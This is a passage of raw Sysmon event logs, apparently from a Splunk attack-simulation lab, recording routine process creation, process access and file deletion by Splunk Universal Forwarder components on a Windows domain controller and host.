Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.980{C8EA50B7-103F-6216-E604-000000003802}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.776{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4FE3866B0B8D9D611DFFD31A3067C86,SHA256=A4519312001C18A8116D8C7817E449A2EC7C8BB65F921236F55E176251B27020,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:19.151{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=190C81D117E7AF923316452B10E2EAEE,SHA256=273C779CFD1D83E911D9B7336CD6DBFE7BF2FC2A6702A74983C41254905CB875,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.698{C8EA50B7-103F-6216-E504-000000003802}31485736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.463{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-103F-6216-E504-000000003802}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.463{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.463{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.463{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.463{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.463{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-103F-6216-E504-000000003802}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.463{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-103F-6216-E504-000000003802}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.464{C8EA50B7-103F-6216-E504-000000003802}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.979{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1040-6216-E804-000000003802}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.979{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1040-6216-E804-000000003802}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.979{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1040-6216-E804-000000003802}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.980{C8EA50B7-1040-6216-E804-000000003802}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.791{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=168F57FE70DC681CE628EEBBF411A762,SHA256=48A7917105D9A8078AB99A798CF19B66702C9675AFD1A77786C26A2E8A3C0AB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:20.151{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D48980E009054CA8981CF87A2393858,SHA256=C5005863BE7AA69ADFC83C1C30BDA26E4F1C49E533C520A6A017D77E4256305D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.729{C8EA50B7-1040-6216-E704-000000003802}54601696C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.479{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1040-6216-E704-000000003802}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.479{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.479{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.479{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.479{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1040-6216-E704-000000003802}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.479{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.479{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1040-6216-E704-000000003802}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 